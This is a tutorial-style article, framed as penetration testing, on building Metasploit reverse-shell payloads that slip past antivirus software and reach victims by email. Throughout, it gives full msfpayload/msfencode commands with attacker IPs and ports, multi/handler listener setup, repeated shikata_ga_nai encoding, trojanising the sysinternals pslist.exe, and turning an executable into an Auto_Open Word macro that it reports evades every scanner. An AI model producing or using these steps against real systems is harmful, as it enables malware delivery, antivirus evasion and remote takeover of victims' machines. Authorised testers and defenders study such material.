A penetration tester simulates an attack on a customer's network by trying to find a way inside. Many such attacks begin with the use of a scanning tool, such as Nexpose, Nessus, or Nmap, to look for network vulnerabilities; however, several of the leading intrusion detection and protection systems are capable of alerting the network owner when a scan is in process. Rather than scanning for an open port, a devious alternative is to email a payload to the victim that will allow the attacker to establish a foothold on the victim's network. The Metasploit framework includes several binary payloads you can use to open an attack by email – if you can slip past the virus scanners.
Metasploit Antivirus Bypass
A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software. Most antivirus software vendors use a signature base to identify malicious code. To avoid antivirus detection, an intruder must devise a payload that will not match the available antivirus signatures.
The Metasploit  penetration testing framework provides a collection of tools you can use to test a network by attacking it the way an intruder would attack it. Metasploit's
msfpayload option lets you create a standalone binary to serve as a malicious payload, and the
msfencode option encodes the binary to confuse the antivirus scanners. Msfpayload allows you to generate shell code, executables and more. To see a list of options, use
msfpayload -h at the command line, and to see a list of available shell code that you can customize for your specific attack, use
msfpayload -l. To see a list of options for msfencode, use
msfencode -h at the command line. To view which encoders are available, run the
msfencode -l command.
Before I encode the payload to bypass antivirus detection, I need to create a standalone binary with
msfpayload, which creates a binary that launches a simple reverse shell, allowing a remote user to connect to the victim's machine. If the target is a Windows box, I can narrow down the list of available payloads with the
msfpayload -l | grep windows
command, which gives a list of payloads that are specific to Windows operating systems (see Figure 1). I'll start by trying the Windows meterpreter
This payload will connect back to the attacker, injecting the meterpreter server DLL via the
Reflective Dll Injection payload (highlight in Figure 1). The
O (capital "oh") command-line argument shows all the available configurable options (see Figure 2).
To create the payload, I use the following command:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe
All that's left now is to deliver the executable to the victim, which requires some skill in itself. To perceive the victim running the executable, I need a listener running on the attack machine:
# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 E
This command will open a listener on the local machine over port
4444. Once the victim runs the executable, it will open a meterpreter shell on the victim's Windows box (Figure 3).
Once the payload is working, the next step is to find a way to avoid antivirus detection. The Virus Total website runs virus scans on file content and reports which scanners will detect the file. I'll use Virus Total to check the results from the previous example and see how many antivirus vendors hit on the exploit. As you can see in Figure 4, many vendors have uncovered the file.
In the hope of achieving a better result, I'll bring in
msfencode to try to get past the antivirus vendors. In this case, I'll pipe the raw output of msfpayload as input to msfencode using the shikata ga nai encoder (a name that translates to "nothing can be done" in Japanese).
The encoder will output a Windows binary:
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe
The results still show several hits with antivirus scanners, so I'll take another approach. Some antivirus vendors work on signature-based technology, and the payload
shell_reverse_tcp shows up right away, so I'll try using the alternative
windows/shell/reverse_tcp payload instead of
# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -t exe -x /root/Desktop/pslist.exe -o /root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10
Also, I will try some additional steps to hide the payload.
This time, I'll take an executable from the sysinternals site called
pslist.exe and encode it 10 times with
shikata_ga_nai. The payload is combined with the sysinternal tool
pslist.exe and renamed
pslist2.exe. Unfortunately (for the attacker), the score at Virus Total improves only slightly (see Figure 5). Several common scanners did not identify the exploit. To set up a listener, you can use the
msfcli command. If the payload slips through, it will open a shell on my Linux box with admin privileges on the Windows system.
As you can see from the previous attempts, although it is possible to slip past a specific scanner with a specific exploit, in general, virus scanners are very proficient at stripping out dangerous executables. Another way to deliver a dangerous payload is with a Word document. Word documents are commonly sent by email and opened by many people. A Word doc is a great attack vector. Metasploit has some built-in methods for infecting Word documents with malicious Metasploit payloads.
To begin, create a VBScript payload:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 ENCODING=shikata_ga_nai X > evi1payload.exe
Now you need to convert this executable to a VBScript with the use of a script found in the
Tools section of Metasploit.
Next, just copy the
evi1payload.exe to the
Tools folder as shown in the following example:
# cp /opt/framework3/msf3/evilpayload.exe /opt/framework3/msf3/tools
Tools folder is a script called
exe2vba.rb. To convert the
.exe to a
.vbs, issue the following command:
# ruby exe2vba.rb evilpayload.exe evi1_payload.vbs
evil_payload.vbs to a Windows machine that has Microsoft Word installed. Open
evil_payload.vbs with Notepad and then open a blank Microsoft Word document. In Microsoft Word 2003, go to Tools | Macros | Visual Basic Editor, or go to
View Macros if you are using Microsoft Word 2010. Next, copy the first portion of
evil_payload.vbs – from
Sub Auto_Open() to
End Sub – and paste it into the Visual Basic Editor in either Microsoft Word 2003 or 2007 (see Figure 6).
The next step is to copy the portion from
PAYLOAD DATA to the end into the body of the Word document. To verify that this Word document can get past antivirus vendors, upload it to Virus Total http://2 and see if it catches anything (Figure 7). As you can see, the Word doc slips past all the antivirus vendors. (See the Results column on the right side of Figure 7.) The only hard part will be getting the victim to open the document.
Once you have delivered the Word document to your intended victim, make sure you have the Metasploit client listener up and running on the attack machine.